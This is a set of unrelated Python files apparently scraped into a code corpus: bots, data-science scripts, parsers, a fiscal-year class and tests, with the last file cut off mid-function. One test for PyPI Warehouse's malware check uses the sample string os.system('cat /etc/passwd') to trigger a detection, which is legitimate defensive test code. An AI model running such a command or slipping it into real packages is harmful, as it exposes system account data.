self.__write_out_file(run_out_file_path, output)
else:
print(output)
@staticmethod
def __write_out_file(path, info, encoding="utf-8"):
with open(path, "a", encoding=encoding) as f:
f.write("%s" % info)
@staticmethod
def __split_sentence(sentence):
pattern = re.compile("[,,。.%、!!??;;~~…….… ]+")
split_clauses = pattern.split(sentence.strip())
punctuations = pattern.findall(sentence.strip())
try:
split_clauses.remove("")
except ValueError:
pass
punctuations.append("")
clauses = ["".join(x) for x in zip(split_clauses, punctuations)]
return clauses
def __get_phrase_dict(self):
"""
取短语词典
:return:
"""
sentiment_dict = []
pattern = re.compile(r"\s+")
with open(self.__root_path + "phrase_dict.txt", "r", encoding="utf-8") as f:
for line in f:
phrase = {}
result = pattern.split(line.strip())
if len(result) >= 2:
phrase["key"] = result[0]
phrase["value"] = float(result[1])
for i, temp_split in enumerate(result):
if i < 2:
continue
else:
a, b = temp_split.split(":")
phrase[a] = b
sentiment_dict.append(phrase)
return sentiment_dict
@staticmethod
def __get_dict(path, encoding="utf-8"):
"""
构建情感词典
:param path:
:param encoding:
:return:
"""
sentiment_dict = {}
pattern = re.compile(r"\s+")
with open(path, encoding=encoding) as f:
for line in f:
result = pattern.split(line.strip())
if len(result) == 2:
sentiment_dict[result[0]] = float(result[1])
return sentiment_dict
|
nilq/baby-python
|
python
|
import discord
import logging
import os
class ValorantBot(discord.Client):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.BOT_LOG = os.getenv('BOT_LOG')
if self.BOT_LOG == 'INFO' or self.BOT_LOG is None or self.BOT_LOG == '':
logging.getLogger().setLevel(logging.INFO)
elif self.BOT_LOG == 'DEBUG':
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.fatal('Neither INFO nor DEBUG specified for log level, refusing to start.')
self.BOT_TOKEN = os.getenv('BOT_TOKEN')
logging.info("ValorantBot initialized.")
def run(self, *args, **kwargs):
if self.BOT_TOKEN is None or self.BOT_TOKEN == '':
logging.fatal('Supply environment variable BOT_TOKEN to authenticate.')
super().run(self.BOT_TOKEN)
async def on_ready(self):
logging.info(f'{self.user} has connected to server')
|
nilq/baby-python
|
python
|
import unittest
from typing import List, Text
INPUT_FILE = "input.txt"
TEST_INPUT_SHORT = "test_input_short.txt"
TEST_INPUT_LONG = "test_input_long.txt"
def getJolts(inputFile: Text):
jolts: List[int] = []
with open(inputFile, "r") as inputFile:
lines = inputFile.readlines()
for line in lines:
line = line.strip("\n")
jolts.append(int(line))
return jolts
def getJoltageDifferenceCountersProduct(jolts: List[int]):
if not jolts:
raise ValueError("No adapters found.")
jolts.append(max(jolts) + 3)
numAdaptersWithOneJoltageDifference = 0
numAdaptersWithThreeJoltageDifference = 0
currentJoltage = 0
joltsSet = set(jolts)
while currentJoltage != max(jolts):
if currentJoltage + 1 in joltsSet:
numAdaptersWithOneJoltageDifference += 1
currentJoltage += 1
elif currentJoltage + 2 in joltsSet:
currentJoltage += 2
elif currentJoltage + 3 in joltsSet:
numAdaptersWithThreeJoltageDifference += 1
currentJoltage += 3
else:
raise ValueError("Connecting adapters is not possible.")
return numAdaptersWithOneJoltageDifference * numAdaptersWithThreeJoltageDifference
def countDistictWaysToArrangeAdapters(jolts: List[int]):
jolts.sort()
maxJoltage: int = max(jolts)
memo: List[int] = [0] * (maxJoltage + 1)
memo[0] = 1
for jolt in jolts:
memo[jolt] = memo[jolt - 1] + memo[jolt - 2] + memo[jolt - 3]
return memo[maxJoltage]
def main():
jolts: List[int] = getJolts(INPUT_FILE)
print(getJoltageDifferenceCountersProduct(jolts)) # 2414
print(countDistictWaysToArrangeAdapters(jolts)) # 21156911906816
class JoltsTester(unittest.TestCase):
def test_getJoltageDifferenceCountersProduct_shortInput_correctProductReturned(self):
jolts: List[int] = getJolts(TEST_INPUT_SHORT)
self.assertEqual(35, getJoltageDifferenceCountersProduct(jolts))
def test_getJoltageDifferenceCountersProduct_longInput_correctProductReturned(self):
jolts: List[int] = getJolts(TEST_INPUT_LONG)
self.assertEqual(220, getJoltageDifferenceCountersProduct(jolts))
def test_countDistinctWaysToArrangeAdapters_shortInput_correctCountReturned(self):
jolts: List[int] = getJolts(TEST_INPUT_SHORT)
self.assertEqual(8, countDistictWaysToArrangeAdapters(jolts))
def test_countDistinctWaysToArrangeAdapters_longInput_correctCountReturned(self):
jolts: List[int] = getJolts(TEST_INPUT_LONG)
self.assertEqual(19208, countDistictWaysToArrangeAdapters(jolts))
if __name__ == '__main__':
# main()
unittest.main()
|
nilq/baby-python
|
python
|
from resolwe.process import IntegerField, Process, StringField
class PythonProcessDataIdBySlug(Process):
"""The process is used for testing get_data_id_by_slug."""
slug = "test-python-process-data-id-by-slug"
name = "Test Python Process Data ID by Slug"
version = "1.0.0"
process_type = "data:python:dataidbyslug"
requirements = {
"resources": {
"network": True,
},
}
class Input:
"""Input fields."""
slug = StringField(label="Slug")
class Output:
data_id = IntegerField(label="Data ID")
def run(self, inputs, outputs):
data_id = self.get_data_id_by_slug(inputs.slug)
outputs.data_id = data_id
|
nilq/baby-python
|
python
|
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import style
import pandas as pd
style.use('fivethirtyeight')
fig = plt.figure(figsize=(12,8))
ax1 = fig.add_subplot(2,2,1)
ax2 = fig.add_subplot(2,2,2)
ax3 = fig.add_subplot(2,2,3)
ax4 = fig.add_subplot(2,2,4)
def animate(i):
df = pd.read_csv('real time stock data.csv')
ys = df.iloc[1:, 2].values
xs = list(range(1, len(ys)+1))
ax1.clear()
ax1.plot(xs, ys)
ax1.set_title('BSE', fontsize=12 )
ys = df.iloc[1:, 3].values
ax2.clear()
ax2.plot(xs, ys)
ax2.set_title('Nifty', fontsize=12 )
ys = df.iloc[1:, 4].values
ax3.clear()
ax3.plot(xs, ys)
ax3.set_title('DJI', fontsize=12 )
ys = df.iloc[1:, 5].values
ax4.clear()
ax4.plot(xs, ys)
ax4.set_title('S&P', fontsize=12 )
ani = animation.FuncAnimation(fig, animate, interval=1000)
plt.tight_layout()
plt.show()
|
nilq/baby-python
|
python
|
import os
from src.MarkdownFile import MarkdownFile
class Parser:
def __init__(self, folderPath='.', ignoredDirectories=['.obsidian', '.git']):
self._folderPath = folderPath
self._ignoredDirectories = ignoredDirectories
self.mdFiles = list[MarkdownFile]
self._retrieveMarkdownFiles()
def _retrieveMarkdownFiles(self):
"""Directory traversal to find all .md files and stores them in _mdFiles
Full credit goes to: https://github.com/archelpeg
"""
self.mdFiles = []
for dirpath, _, files in os.walk(self._folderPath):
# print(f'Found directory: {dirpath}, and ignored={self._isDirectoryIgnored(dirpath)}')
if not self._isDirectoryIgnored(dirpath):
for file_name in files:
if file_name.endswith('.md'):
normalised_path = os.path.normpath(dirpath + "/" + file_name) # normalises path for current file system
file = MarkdownFile(file_name, normalised_path)
self.mdFiles.append(file)
def _isDirectoryIgnored(self, directory: str):
"""Returns a boolean indicating if the directory specified is in self._ignoredDirectories"""
directory = directory.replace('\\', '/')
normalisedFolderPath = self._folderPath.replace('\\', '/')
splitDirectory = directory.split('/')
splitFolderPath = normalisedFolderPath.split('/')
# Remove folderPath in order to search uniquely in subdirectories
for el in splitFolderPath:
splitDirectory.remove(el)
# Return if the subdirectory starts with a element in ignoredDirectories
if len(splitDirectory) != 0:
return splitDirectory[0] in self._ignoredDirectories
else:
return False
def searchFilesWithTag(self, tag=None):
"""Find all files containing a specific tag
"""
files = set()
if tag == None:
return files
for file in self.mdFiles:
if tag in file.tags:
files.add(file)
return files
def findSubFilesForFiles(self, files: set):
"""Iteration to grow files while it can"""
while not self._growSubFiles(files):
pass
return files
def _growSubFiles(self, files):
"""Add new files found following links in files and stores them in files"""
addedFiles = set()
for file in files:
linkedFiles = file.links
linkedFiles = [link for link in linkedFiles] # Added .md at the end
linkedFiles = [file # Get the full links
for file in self.mdFiles
for link in linkedFiles
if link in file.fileName
]
linkedFiles = set(linkedFiles) - files # Only keep not added files
for link in linkedFiles:
addedFiles.add(link)
for file in addedFiles:
files.add(file)
return len(addedFiles) == 0
|
nilq/baby-python
|
python
|
# Created byMartin.cz
# Copyright (c) Martin Strohalm. All rights reserved.
import pero
class DrawTest(pero.Graphics):
"""Test case for text properties drawing."""
def draw(self, canvas, *args, **kwargs):
"""Draws the test."""
# clear canvas
canvas.fill(pero.colors.White)
# set scaling
canvas.draw_scale = 1
canvas.line_scale = 3
canvas.font_scale = 1.5
# init glyphs
origin = pero.Plus(
size = 20,
line_width = 1,
line_color = pero.colors.Red)
label = pero.Text(
angle = pero.rads(20),
font_size = 12,
font_name = "Arial",
text_spacing = .5,
text_bgr_color = pero.colors.Grey.opaque(.3))
rect = pero.Rect(
line_color = pero.colors.Green,
fill_color = None)
# init coords
padding = 40
# test alignment and baseline
y = padding
for base in (pero.TEXT_BASE_TOP, pero.TEXT_BASE_MIDDLE, pero.TEXT_BASE_BOTTOM):
x = padding
for align in (pero.TEXT_ALIGN_LEFT, pero.TEXT_ALIGN_CENTER, pero.TEXT_ALIGN_RIGHT):
text = "%s\n%s" % (base.upper(), align.upper())
label.draw(canvas, x=x, y=y, text=text, text_align=align, text_base=base)
bbox = canvas.get_text_bbox(text, x, y, label.angle)
rect.draw(canvas, x=bbox.x, y=bbox.y, width=bbox.width, height=bbox.height)
origin.draw(canvas, x=x, y=y)
x += 250/canvas.draw_scale
y += 150/canvas.draw_scale
# run test
if __name__ == '__main__':
pero.debug(DrawTest(), 'show', "Text", 700, 370)
|
nilq/baby-python
|
python
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pretend
import pytest
import yara
from warehouse.malware.checks.setup_patterns import check as c
from warehouse.malware.models import (
MalwareCheckState,
VerdictClassification,
VerdictConfidence,
)
from .....common.db.malware import MalwareCheckFactory
from .....common.db.packaging import FileFactory
def test_initializes(db_session):
check_model = MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
assert check.id == check_model.id
assert isinstance(check._yara_rules, yara.Rules)
@pytest.mark.parametrize(
("obj", "file_url"), [(None, pretend.stub()), (pretend.stub(), None)]
)
def test_scan_missing_kwargs(db_session, obj, file_url):
MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
with pytest.raises(c.FatalCheckException):
check.scan(obj=obj, file_url=file_url)
def test_scan_non_sdist(db_session):
MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
file = FileFactory.create(packagetype="bdist_wheel")
check.scan(obj=file, file_url=pretend.stub())
assert check._verdicts == []
def test_scan_no_setup_contents(db_session, monkeypatch):
monkeypatch.setattr(
c, "fetch_url_content", pretend.call_recorder(lambda *a: pretend.stub())
)
monkeypatch.setattr(
c, "extract_file_content", pretend.call_recorder(lambda *a: None)
)
MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
file = FileFactory.create(packagetype="sdist")
check.scan(obj=file, file_url=pretend.stub())
assert len(check._verdicts) == 1
assert check._verdicts[0].check_id == check.id
assert check._verdicts[0].file_id == file.id
assert check._verdicts[0].classification == VerdictClassification.Indeterminate
assert check._verdicts[0].confidence == VerdictConfidence.High
assert (
check._verdicts[0].message
== "sdist does not contain a suitable setup.py for analysis"
)
def test_scan_benign_contents(db_session, monkeypatch):
monkeypatch.setattr(
c, "fetch_url_content", pretend.call_recorder(lambda *a: pretend.stub())
)
monkeypatch.setattr(
c,
"extract_file_content",
pretend.call_recorder(lambda *a: b"this is a benign string"),
)
MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
file = FileFactory.create(packagetype="sdist")
check.scan(obj=file, file_url=pretend.stub())
assert len(check._verdicts) == 1
assert check._verdicts[0].check_id == check.id
assert check._verdicts[0].file_id == file.id
assert check._verdicts[0].classification == VerdictClassification.Benign
assert check._verdicts[0].confidence == VerdictConfidence.Low
assert check._verdicts[0].message == "No malicious patterns found in setup.py"
def test_scan_matched_content(db_session, monkeypatch):
monkeypatch.setattr(
c, "fetch_url_content", pretend.call_recorder(lambda *a: pretend.stub())
)
monkeypatch.setattr(
c,
"extract_file_content",
pretend.call_recorder(
lambda *a: b"this looks suspicious: os.system('cat /etc/passwd')"
),
)
MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
file = FileFactory.create(packagetype="sdist")
check.scan(obj=file, file_url=pretend.stub())
assert len(check._verdicts) == 1
assert check._verdicts[0].check_id == check.id
assert check._verdicts[0].file_id == file.id
assert check._verdicts[0].classification == VerdictClassification.Threat
assert check._verdicts[0].confidence == VerdictConfidence.High
assert check._verdicts[0].message == "process_spawn_in_setup"
|
nilq/baby-python
|
python
|
########################################
# Automatically generated, do not edit.
########################################
from pyvisdk.thirdparty import Enum
AutoStartWaitHeartbeatSetting = Enum(
'no',
'systemDefault',
'yes',
)
|
nilq/baby-python
|
python
|
"""
Vulnerability service interfaces and implementations for `pip-audit`.
"""
from .interface import (
Dependency,
ResolvedDependency,
ServiceError,
SkippedDependency,
VulnerabilityResult,
VulnerabilityService,
)
from .osv import OsvService
from .pypi import PyPIService
__all__ = [
"Dependency",
"ResolvedDependency",
"ServiceError",
"SkippedDependency",
"VulnerabilityResult",
"VulnerabilityService",
"OsvService",
"PyPIService",
]
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import sys
from shutil import rmtree
from os.path import abspath, dirname, join
import django
from django.conf import settings
sys.path.insert(0, abspath(dirname(__file__)))
if not settings.configured:
media_root = join(abspath(dirname(__file__)), 'test_files')
rmtree(media_root, ignore_errors=True)
installed_apps = (
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.admin',
'simple_history',
'simple_history.tests',
'simple_history.tests.external',
)
auth_user_model = 'auth.User'
if django.VERSION >= (1, 5):
installed_apps += ('simple_history.tests.custom_user', )
auth_user_model = 'custom_user.CustomUser'
settings.configure(
ROOT_URLCONF='simple_history.tests.urls',
MEDIA_ROOT=media_root,
STATIC_URL='/static/',
INSTALLED_APPS=installed_apps,
DATABASES={
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
},
AUTH_USER_MODEL=auth_user_model
)
def main():
from django.test.simple import DjangoTestSuiteRunner
failures = DjangoTestSuiteRunner(
verbosity=1, interactive=True, failfast=False).run_tests(['tests'])
sys.exit(failures)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
import lightgbm as lgbm
from sklearn.model_selection import StratifiedKFold
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score
def load_data():
real_df = pd.read_csv(
"feat/real.txt",
delimiter=" ",
header=None,
names=["a", "b", "c", "d", "e", "f"],
index_col=False,
float_precision="high",
)
real_df["target"] = 1
fake_df = pd.read_csv(
"feat/fake.txt",
delimiter=" ",
header=None,
names=["a", "b", "c", "d", "e", "f"],
index_col=False,
float_precision="high",
)
fake_df["target"] = 0
real_df.head()
df = pd.concat([real_df, fake_df], ignore_index=True, sort=False)
del real_df, fake_df
y = df.target.values
df = df.drop("target", axis="columns").values
return df, y
data, target = load_data()
NFOLDS = 5
kfold = StratifiedKFold(n_splits=NFOLDS, shuffle=True, random_state=218)
learning_rate = 0.1
num_leaves = 15
min_data_in_leaf = 2000
feature_fraction = 0.6
num_boost_round = 100
params = {"objective": "binary",
"boosting_type": "gbdt",
"learning_rate": learning_rate,
"num_leaves": num_leaves,
"max_bin": 256,
"feature_fraction": feature_fraction,
"drop_rate": 0.1,
"is_unbalance": False,
"max_drop": 50,
"min_child_samples": 10,
"min_child_weight": 150,
"min_split_gain": 0,
"subsample": 0.9,
"metric": 'binary',
"verbose": 5,
"n_jobs": -1
}
x_score = []
final_cv_train = np.zeros(len(data))
kf = kfold.split(data, target)
for i, (train_fold, validate) in enumerate(kf):
X_train, X_validate, label_train, label_validate = \
data[train_fold, :], data[validate, :], target[train_fold], target[validate]
dtrain = lgbm.Dataset(X_train, label_train)
dvalid = lgbm.Dataset(X_validate, label_validate, reference=dtrain)
bst = lgbm.train(params, dtrain, num_boost_round, valid_sets=dvalid,
early_stopping_rounds=100)
preds = bst.predict(X_validate)
print(preds.shape)
print(preds)
print(f"Fold {i+1} score {accuracy_score(label_validate, preds)}")
|
nilq/baby-python
|
python
|
class BudgetFiscalYear():
'''Class to describe the federal fiscal year'''
__base = None
__bfy = None
__efy = None
__today = None
__date = None
__startdate = None
__enddate = None
__expiration = None
__weekends = 0
__workdays = 0
__year = None
__month = None
__day = None
__holidays = None
__data = None
__dataframe = None
@property
def firstyear( self ):
if self.__base is not None:
return self.__bfy
@firstyear.setter
def firstyear( self, yr ):
if yr is not None:
self.__bfy = str( yr )
self.__data[ 'firstyear' ] = self.__bfy
@property
def lastyear( self ):
if self.__efy is not None:
return self.__efy
@lastyear.setter
def lastyear( self, yr ):
if yr is not None:
self.__efy = str( yr )
self.__data[ 'lastyear' ] = self.__efy
@property
def calendaryear( self ):
if self.__year:
return self.__year
@calendaryear.setter
def calendaryear( self, yr ):
if yr is not None:
self.__year = str( yr )
self.__data[ 'calendaryear' ] = self.__year
@property
def startdate( self ):
if isinstance( self.__startdate, dt.date ):
return self.__startdate
@startdate.setter
def startdate( self, start ):
if isinstance( start, dt.date ):
self.__startdate = start
self.__data[ 'startdate' ] = self.__startdate
@property
def enddate( self ):
if isinstance( self.__enddate, dt.date ):
return self.__enddate
@enddate.setter
def enddate( self, end ):
if isinstance( end, dt.date ):
self.__enddate = end
self.__data[ 'enddate' ] = self.__enddate
@property
def expiration( self ):
if isinstance( self.__expiration, dt.date ):
return self.__expiration
@expiration.setter
def expiration( self, exp ):
if isinstance( exp, dt.date ):
self.__expiration = exp
self.__data[ 'expiration' ] = self.__expiration
@property
def weekends( self ):
if self.__weekends is not None:
return self.__weekends
@weekends.setter
def weekends( self, end ):
if isinstance( end, int ):
self.__weekends = end
self.__data[ 'weekends' ] = self.__weekends
@property
def workdays( self ):
if self.__workdays is not None:
return float( self.__workdays )
@workdays.setter
def workdays( self, work ):
if isinstance( work, int ):
self.__workdays = work
self.__data[ 'workdays' ] = self.__workdays
@property
def date( self ):
if isinstance( self.__date, dt.date ):
return self.__date
@date.setter
def date( self, today ):
if isinstance( today, dt.date ):
self.__date = today
self.__data[ 'date' ] = self.__date
@property
def day( self ):
if self.__day is not None:
return self.__day
@day.setter
def day( self, today ):
if isinstance( today, dt.date ):
self.__day = today
self.__data[ 'day' ] = self.__day
@property
def month( self ):
if self.__month is not None:
return self.__month
@property
def holidays( self ):
if self.__holidays is not None:
return self.__holidays
@property
def data( self ):
if self.__data is not None:
return self.__data
@data.setter
def data( self, src ):
if isinstance( src, pd.DataFrame ):
self.__data = src
@property
def table( self ):
if self.__dataframe is not None:
return self.__dataframe
def __init__( self, bfy ):
self.__today = dt.date.today()
self.__base = str( bfy )
self.__date = self.__today
self.__year = int( self.__base )
self.__day = self.__date.day
self.__month = self.__date.month
self.__startdate = dt.date( self.__year, 10, 1 )
self.__bfy = str( self.__startdate.year )
self.__enddate = dt.date( self.__year + 1, 9, 30 )
self.__efy = str( self.__enddate.year )
self.__data = { 'base': self.__base,
'date': self.__date,
'calendaryear': self.__year,
'day': self.__day,
'month': self.__month,
'startdate': self.__startdate,
'enddate': self.__enddate }
self.__dataframe = pd.DataFrame
def __str__( self ):
return str( self.__year )
|
nilq/baby-python
|
python
|
# import os
# import shutil
# from django.test import TestCase
# from django_dicom.data_import.local_import import LocalImport
# from django_dicom.models.image import Image
# from tests.fixtures import TEST_FILES_PATH, TEST_IMAGE_PATH, TEST_ZIP_PATH
# TESTS_DIR = os.path.normpath("./tests")
# TEMP_FILES = os.path.join(TESTS_DIR, "tmp*.dcm")
# IMPORTED_DIR = os.path.join(TESTS_DIR, "MRI")
# class LocalImportTestCase(TestCase):
# """
# Tests for the :class:`~django_dicom.data_import.local_import.LocalImport` class,
# which is meant to provide methods to facilitate data import.
# """
# def tearDown(self):
# """
# Tries to remove the :class:`~django_dicom.models.image.Image` instances
# that may have been created during each test, as well as the destination
# directory.
# For more information see unittest's :meth:`~unittest.TestCase.tearDown` method.
# """
# Image.objects.all().delete()
# try:
# shutil.rmtree(IMPORTED_DIR)
# except FileNotFoundError:
# pass
# def test_initialization(self):
# """
# Tests that the :class:`~django_dicom.data_import.local_import.LocalImport`
# class is initialized properly.
# """
# instance = LocalImport(TEST_IMAGE_PATH)
# self.assertEqual(instance.path, TEST_IMAGE_PATH)
# def test_import_local_dcm(self):
# """
# Tests importing a single DICOM image from some path using
# :meth:`~django_dicom.data_import.local_import.LocalImport.import_local_dcm`.
# """
# image, created = LocalImport.import_local_dcm(TEST_IMAGE_PATH)
# self.assertTrue(created)
# self.assertIsInstance(image, Image)
# # Also check that the created instance is updated
# self.assertIsNotNone(image.uid)
# self.assertIsNotNone(image.series)
# self.assertIsNotNone(image.series.study)
# self.assertIsNotNone(image.series.patient)
# def test_import_local_zip_archive(self):
# """
# Tests importing DICOM images from a single ZIP archive using
# :meth:`~django_dicom.data_import.local_import.LocalImport.import_local_zip_archive`.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport.import_local_zip_archive(TEST_ZIP_PATH, verbose=False)
# # The ZIP archive contains 3 images
# self.assertEqual(Image.objects.count(), 3)
# def test_path_generator_without_extension(self):
# """
# Tests the :meth:`~django_dicom.data_import.local_import.LocalImport.path_generator`
# method with no *extension* parameter setting.
# """
# counter = 0
# for path in LocalImport(TEST_FILES_PATH).path_generator():
# is_valid_path = os.path.isfile(path)
# self.assertTrue(is_valid_path)
# is_under_base_dir = path.startswith(TEST_FILES_PATH)
# self.assertTrue(is_under_base_dir)
# counter += 1
# # There are 6 files in the given path
# self.assertEqual(counter, 6)
# def test_path_generator_with_extension(self):
# """
# Tests the :meth:`~django_dicom.data_import.local_import.LocalImport.path_generator`
# method with the *extension* parameter set.
# """
# # A dictionary of extensions and the number of files we expect
# extensions = {"zip": 2, "dcm": 4}
# for extension in extensions:
# counter = 0
# generator = LocalImport(TEST_FILES_PATH).path_generator(extension=extension)
# for path in generator:
# is_valid_path = os.path.isfile(path)
# self.assertTrue(is_valid_path)
# is_under_base_dir = path.startswith(TEST_FILES_PATH)
# self.assertTrue(is_under_base_dir)
# counter += 1
# self.assertEqual(counter, extensions.get(extension))
# def test_import_dcm_files(self):
# """
# Tests importing multiple DICOM images at once using the
# :meth:`~django_dicom.data_import.local_import.LocalImport.import_dcm_files`
# method.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport(TEST_FILES_PATH).import_dcm_files(verbose=False)
# # There are 4 DICOM images in the test files directory.
# self.assertEqual(Image.objects.count(), 4)
# def test_import_zip_archives(self):
# """
# Tests importing DICOM images from multiple ZIP archives at once using the
# :meth:`~django_dicom.data_import.local_import.LocalImport.import_zip_archives`
# method.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport(TEST_FILES_PATH).import_zip_archives(verbose=False)
# # The ZIP archives contain a total of 4 (unique) DICOM images.
# self.assertEqual(Image.objects.count(), 4)
# def test_run_with_zip_archives(self):
# """
# Tests the :class:`~django_dicom.data_import.local_import.LocalImport` class's
# :meth:`~django_dicom.data_import.local_import.LocalImport.run` method when
# set to include ZIP archives.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport(TEST_FILES_PATH).run(import_zip=True, verbose=False)
# # The test files directory contains a total of 8 (unique) DICOM images.
# self.assertEqual(Image.objects.count(), 8)
# def test_run_without_zip_archives(self):
# """
# Tests the :class:`~django_dicom.data_import.local_import.LocalImport` class's
# :meth:`~django_dicom.data_import.local_import.LocalImport.run` method when
# set to exclude ZIP archives.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport(TEST_FILES_PATH).run(import_zip=False, verbose=False)
# # There are 4 DICOM images in the test files directory.
# self.assertEqual(Image.objects.count(), 4)
# def test_run_default_configuration(self):
# """
# Tests the :class:`~django_dicom.data_import.local_import.LocalImport` class's
# :meth:`~django_dicom.data_import.local_import.LocalImport.run` method's
# default configuration is to include ZIP archives.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport(TEST_FILES_PATH).run(verbose=False)
# # The test files directory contains a total of 8 (unique) DICOM images.
# self.assertEqual(Image.objects.count(), 8)
|
nilq/baby-python
|
python
|
import os
import joblib
import pandas as pd
import numpy as np
from dataclasses import dataclass
from sklearn.preprocessing import RobustScaler
from sklearn.feature_selection import VarianceThreshold
from rdkit import Chem
from rdkit.Chem import MACCSkeys
from rdkit.Chem import MolFromSmarts
from mordred import Calculator, descriptors
# VARIABLES
PATH = os.path.abspath(os.path.dirname(__file__))
DATA_PATH = os.path.abspath(os.path.join(PATH, "..", "data"))
# PROCESSING FUNCTIONS
MAX_NA = 0.2
class NanFilter(object):
def __init__(self):
self._name = "nan_filter"
def fit(self, X):
max_na = int((1 - MAX_NA) * X.shape[0])
idxs = []
for j in range(X.shape[1]):
c = np.sum(np.isnan(X[:, j]))
if c > max_na:
continue
else:
idxs += [j]
self.col_idxs = idxs
def transform(self, X):
return X[:, self.col_idxs]
def save(self, file_name):
joblib.dump(self, file_name)
def load(self, file_name):
return joblib.load(file_name)
class Scaler(object):
def __init__(self):
self._name = "scaler"
self.abs_limit = 10
self.skip = False
def set_skip(self):
self.skip = True
def fit(self, X):
if self.skip:
return
self.scaler = RobustScaler()
self.scaler.fit(X)
def transform(self, X):
if self.skip:
return X
X = self.scaler.transform(X)
X = np.clip(X, -self.abs_limit, self.abs_limit)
return X
def save(self, file_name):
joblib.dump(self, file_name)
def load(self, file_name):
return joblib.load(file_name)
class Imputer(object):
def __init__(self):
self._name = "imputer"
self._fallback = 0
def fit(self, X):
ms = []
for j in range(X.shape[1]):
vals = X[:, j]
mask = ~np.isnan(vals)
vals = vals[mask]
if len(vals) == 0:
m = self._fallback
else:
m = np.median(vals)
ms += [m]
self.impute_values = np.array(ms)
def transform(self, X):
for j in range(X.shape[1]):
mask = np.isnan(X[:, j])
X[mask, j] = self.impute_values[j]
return X
def save(self, file_name):
joblib.dump(self, file_name)
def load(self, file_name):
return joblib.load(file_name)
class VarianceFilter(object):
def __init__(self):
self._name = "variance_filter"
def fit(self, X):
self.sel = VarianceThreshold()
self.sel.fit(X)
self.col_idxs = self.sel.transform([[i for i in range(X.shape[1])]]).ravel()
def transform(self, X):
return self.sel.transform(X)
def save(self, file_name):
joblib.dump(self, file_name)
def load(self, file_name):
return joblib.load(file_name)
# MORDRED DESCRIPTORS
def mordred_featurizer(smiles):
calc = Calculator(descriptors, ignore_3D=True)
df = calc.pandas([Chem.MolFromSmiles(smi) for smi in smiles])
return df
class MordredDescriptor(object):
def __init__(self):
self.nan_filter = NanFilter()
self.imputer = Imputer()
self.variance_filter = VarianceFilter()
self.scaler = Scaler()
def fit(self, smiles):
df = mordred_featurizer(smiles)
X = np.array(df, dtype=np.float32)
self.nan_filter.fit(X)
X = self.nan_filter.transform(X)
self.imputer.fit(X)
X = self.imputer.transform(X)
self.variance_filter.fit(X)
X = self.variance_filter.transform(X)
self.scaler.fit(X)
X = self.scaler.transform(X)
self.features = list(df.columns)
self.features = [self.features[i] for i in self.nan_filter.col_idxs]
self.features = [self.features[i] for i in self.variance_filter.col_idxs]
return pd.DataFrame(X, columns=self.features)
def transform(self, smiles):
df = mordred_featurizer(smiles)
X = np.array(df, dtype=np.float32)
X = self.nan_filter.transform(X)
X = self.imputer.transform(X)
X = self.variance_filter.transform(X)
X = self.scaler.transform(X)
return pd.DataFrame(X, columns=self.features)
# CLASSIC DESCRIPTORS
@dataclass
class Descriptors:
"""Molecular descriptors"""
#: Descriptor type
descriptor_type: str
#: Descriptor values
descriptors: tuple
# Descriptor name
descriptor_names: tuple
# t_stats for each molecule
tstats: tuple = ()
def _calculate_rdkit_descriptors(mol):
from rdkit.ML.Descriptors import MoleculeDescriptors # type: ignore
dlist = [
"NumHDonors",
"NumHAcceptors",
"MolLogP",
"NumHeteroatoms",
"RingCount",
"NumRotatableBonds",
]
c = MoleculeDescriptors.MolecularDescriptorCalculator(dlist)
d = c.CalcDescriptors(mol)
def calc_aromatic_bonds(mol):
return sum(1 for b in mol.GetBonds() if b.GetIsAromatic())
def _create_smarts(SMARTS):
s = ",".join("$(" + s + ")" for s in SMARTS)
_mol = MolFromSmarts("[" + s + "]")
return _mol
def calc_acid_groups(mol):
acid_smarts = (
"[O;H1]-[C,S,P]=O",
"[*;-;!$(*~[*;+])]",
"[NH](S(=O)=O)C(F)(F)F",
"n1nnnc1",
)
pat = _create_smarts(acid_smarts)
return len(mol.GetSubstructMatches(pat))
def calc_basic_groups(mol):
basic_smarts = (
"[NH2]-[CX4]",
"[NH](-[CX4])-[CX4]",
"N(-[CX4])(-[CX4])-[CX4]",
"[*;+;!$(*~[*;-])]",
"N=C-N",
"N-C=N",
)
pat = _create_smarts(basic_smarts)
return len(mol.GetSubstructMatches(pat))
def calc_apol(mol, includeImplicitHs=True):
# atomic polarizabilities available here:
# https://github.com/mordred-descriptor/mordred/blob/develop/mordred/data/polarizalibity78.txt
ap = os.path.join(DATA_PATH, "atom_pols.txt")
with open(ap, "r") as f:
atom_pols = [float(x) for x in next(f).split(",")]
res = 0.0
for atom in mol.GetAtoms():
anum = atom.GetAtomicNum()
if anum <= len(atom_pols):
apol = atom_pols[anum]
if includeImplicitHs:
